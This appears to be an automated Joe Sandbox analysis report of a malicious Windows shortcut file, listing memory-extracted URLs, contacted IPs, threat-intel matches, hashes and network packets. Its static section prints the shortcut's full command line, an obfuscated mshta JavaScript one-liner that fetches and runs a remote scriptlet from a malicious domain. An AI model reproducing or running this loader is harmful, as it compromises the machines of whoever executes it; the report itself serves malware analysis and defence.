                                                                                https://www.twitter.commshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F318000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://flinanmansal.roupagucci.sbs/mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://dwo3ckksxlb0v.cloudfront.net;mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  https://ton-staging.atla.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.twitter.com/xmshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://t.co/1/i/adsct;mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://business.twitter.com/en/help/troubleshooting/how-twitter-ads-work.html?ref=web-twc-ao-gbl-admshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://pdhdsnappytv-vh.akamaihd.netmshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.twitter.com(mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F318000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		low
                                                                                            HTtps://flinanmansal.roupagucci.sbs/?1/mshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112009127.000002A68F0DD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://dwo3ckksxlb0v.cloudfront.netmshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://flinanmansal.roupagucci.sbs/?1/9?smshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://scontent.xx.fbcdn.netmshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://localhost.x.com:3443;mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		low
                                                                                                https://media.tenor.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://prod-periscope-profile.s3-us-west-2.amazonaws.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://legal.twitter.com/imprint.htmlmshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://prod-periscope-profile.s1mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://flinanmansal.roupagucci.sbs/?1/??umshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://aa.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://platform-lookaside.fbsbx.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://analytics.x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • 0%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://caps.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://twitter.com/tosmshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://abs.twimg.com/errors/logo46x38mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://aa.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • 0%, Virustotal, Browse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://flinanmansal.roupagucci.sbs/?1/Ztumshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://mpdhdsnappytv-vh.akamaihd.netmshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://api-stream.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://mobile.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://ton-staging.atla.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://www.google.com/recaptcha/mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://ads-api.x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://ads-api.twitter.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://help.twitter.com/using-twitter/twitter-supported-browsersmshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://abs.twimg.com/errors/logo46x38.pngmshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://scontent-sea1-1.xx.fbcdn.netmshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://mdhdsnappytv-vh.akamaihd.netmshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://caps.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://api.x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://client-api.arkoselabs.com/mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown

                                                                                                                              World Map of Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public IPs

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              104.244.42.65
                                                                                                                              		twitter.comUnited States
                                                                                                                              		13414TWITTERUSfalse
                                                                                                                              104.21.29.223
                                                                                                                              		flinanmansal.roupagucci.sbsUnited States
                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                              General Information

                                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                              Analysis ID:1431784
                                                                                                                              Start date and time:2024-04-25 19:21:08 +02:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 4m 8s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:8
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:ProconGO1121082800.LnK.lnk
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal52.winLNK@4/0@3/2
                                                                                                                              EGA Information:Failed
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 100%
                                                                                                                              • Number of executed functions: 1
                                                                                                                              • Number of non-executed functions: 0
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .lnk

                                                                                                                              Warnings

                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 5224 because there are no executed function
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              No simulations

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              104.244.42.65wDeGiI6U9u.exeGet hashmaliciousGurcu StealerBrowse
                                                                                                                              • twitter.com/UVE4rzhe8O?12=1
                                                                                                                              https://cutt.us/oPNMU?impGet hashmaliciousUnknownBrowse
                                                                                                                              • twitter.com/cuturl
                                                                                                                              http://www.secured-mailsharepoint.online/Get hashmaliciousUnknownBrowse
                                                                                                                              • twitter.com/

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              twitter.comhttp://94.156.79.129/x86_64Get hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.65

                                                                                                                              ASNs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              CLOUDFLARENETUSo3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                              • 172.67.74.152
                                                                                                                              http://www.mh3solaroh.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 104.17.246.203
                                                                                                                              https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 172.67.69.226
                                                                                                                              https://www.jottacloud.com/s/3542495a6cd3d7a4aafad5878d671fdee68Get hashmaliciousUnknownBrowse
                                                                                                                              • 162.159.152.4
                                                                                                                              http://email.wantyourfeedback.com/ls/click?upn=u001.PD4nPnyJUo8oiEzSkSGLgaBNAMtLp9U5nstWElDmnpXtySPOXSs4GxXhEZNYegDWlOpy_1gt1aDjd5mPVItYgazWgABkVm-2FZUH6kt1lIvkdtkRWsfoyQV18ixDvOX-2B0tU4ZH6SMN7PC0YJjM3gcvFPvh6CbZuFXlOBXf3FWLiJkpKJ7Hjba3S4-2FzhpmkR8VdprfK8GO3qSu-2BzqpIaLLC-2Bva9kOn7HY5B7OIgz5EOl88o1lnRSRpayTzqRzTSFhtg2Bi-2BI4dAZ7qHRbJ3vb9lcrxBKqAk13I-2BCAvndhSK1Vi4ubCjlp2xQlrXIHfzqmLiSPjl7tEmTsLYr99h3esBOPv8ASLIpf873P512I7xYEOjogT1gQCerfZNqh6K2IdWU6lDJ2r3wpU6ug02vU9Zslw4DYpuNNZQNVtap5mqv9Xf8D1PYQxYI5BK4owXOV2wEXeRIjST24XAw6EO9D1tdiGoHDRaxW2QofayefCuiW9Z191aML90svJWojHiQp1Fq-2BXFLiyEx8V1eLa7dixfJ23RRWtHvg1jOrHp7lqvXRA7dobs-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 172.67.223.170
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 104.21.16.225
                                                                                                                              http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                                                                                              • 104.26.0.231
                                                                                                                              https://rro5wktwxr4n.rollout-specialist-assistance-network.cfd/support_case_ID/#8347435238Get hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.222.163
                                                                                                                              https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 104.21.17.5
                                                                                                                              file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                              • 104.26.5.15
                                                                                                                              TWITTERUShttps://runrun.it/share/portal/x1pWDYC5l2f72kuwGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 104.244.42.194
                                                                                                                              https://starmicronics.com/support/download/starprnt-intelligence-software-setup-exe-file-v3-6-0a/#unlockGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.195
                                                                                                                              https://cos-aliyun8789.towqzg.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.67
                                                                                                                              http://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 104.244.42.131
                                                                                                                              https://jiujiuwanka.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.3
                                                                                                                              https://goxdgdb.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.195
                                                                                                                              https://x9mihc.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.3
                                                                                                                              https://zgmskjr.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.67
                                                                                                                              http://keeper.comGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.136
                                                                                                                              https://in.xero.com/VmFUGq2DR0w0RroiyvWAWXw083jyp1tZyI3WNgUe?utm_source=invoiceEmailViewInvoiceButtonSecondary&utm_campaign=invoicesEmailStandardV2Get hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.5

                                                                                                                              JA3 Fingerprints

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223
                                                                                                                              Version.125.7599.75.jsGet hashmaliciousSocGholishBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223
                                                                                                                              Database4.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223
                                                                                                                              lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223
                                                                                                                              XV9q6mY4DI.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223
                                                                                                                              n8XBpFdVFU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223
                                                                                                                              R5391762lf.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223
                                                                                                                              Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223
                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223
                                                                                                                              mU2p71KMss.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                              • 104.244.42.65
                                                                                                                              • 104.21.29.223

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              No created / dropped files found

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:MS Windows shortcut, Item id list present, Has command line arguments, Archive, ctime=*Invalid time*, mtime=*Invalid time*, atime=*Invalid time*, length=626328371, window=hidenormalshowminimized
                                                                                                                              Entropy (8bit):7.99696051348932
                                                                                                                              TrID:
                                                                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                                                                              File name:ProconGO1121082800.LnK.lnk
                                                                                                                              File size:68'063 bytes
                                                                                                                              MD5:3849799c2978740cc3e27cc3ec5980c5
                                                                                                                              SHA1:6dfe666bdc1e961d29d56fb9754ed24590b43c8f
                                                                                                                              SHA256:a1bda78309cd02e62af859fe5171b65baa9b34861088e8c9fede648d4ef0fca4
                                                                                                                              SHA512:8d9939c5dbe6cacaa8087335bb228e7e32e43b52eb38ee7165af42eec30e7319cc8d19e431b5125db1d74831d6844428abd2f0c1e889acfbe52efecda7d74a6a
                                                                                                                              SSDEEP:1536:UCmxmP2rmBjJW4RhWc/GE9jAI78DmYpWMO5h3VJdA8prI2s9vM7CKNK4:OxtrmBj7yIG8Ao8DTsh3VJdA8prtEsl1
                                                                                                                              TLSH:8A63F185A45A1AFAC9F5E9FEE5DB4806722314C6A6DF15947BD4BF09888241C130933E
                                                                                                                              File Content Preview:L..................F!... ...JQ..)..3JQ..)..3JQ..)..33.U%....................Y....P.O. .:i.....+00.../C:\......................'.2...........Windows\System32\cmd.exe...6./c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160

                                                                                                                              File Icon

                                                                                                                              Icon Hash:b0ef3ac32d2dadad

                                                                                                                              Static Windows Shortcut Info

                                                                                                                              General

                                                                                                                              Relative Path:
                                                                                                                              Command Line Argument:/c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
                                                                                                                              Icon location:

                                                                                                                              Network Behavior

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Apr 25, 2024 19:21:55.208003044 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:55.208059072 CEST44349699104.21.29.223192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:55.208131075 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:55.216787100 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:55.216799974 CEST44349699104.21.29.223192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:55.463450909 CEST44349699104.21.29.223192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:55.463526964 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:55.547394037 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:55.547426939 CEST44349699104.21.29.223192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:55.548449993 CEST44349699104.21.29.223192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:55.548530102 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:55.551017046 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:55.596126080 CEST44349699104.21.29.223192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.088413954 CEST44349699104.21.29.223192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.088493109 CEST44349699104.21.29.223192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.088555098 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:57.088577986 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:57.091650009 CEST49699443192.168.2.6104.21.29.223
                                                                                                                              Apr 25, 2024 19:21:57.091666937 CEST44349699104.21.29.223192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.224684954 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.224766016 CEST44349700104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.224884033 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.225601912 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.225635052 CEST44349700104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.462229967 CEST44349700104.244.42.65192.168.2.6
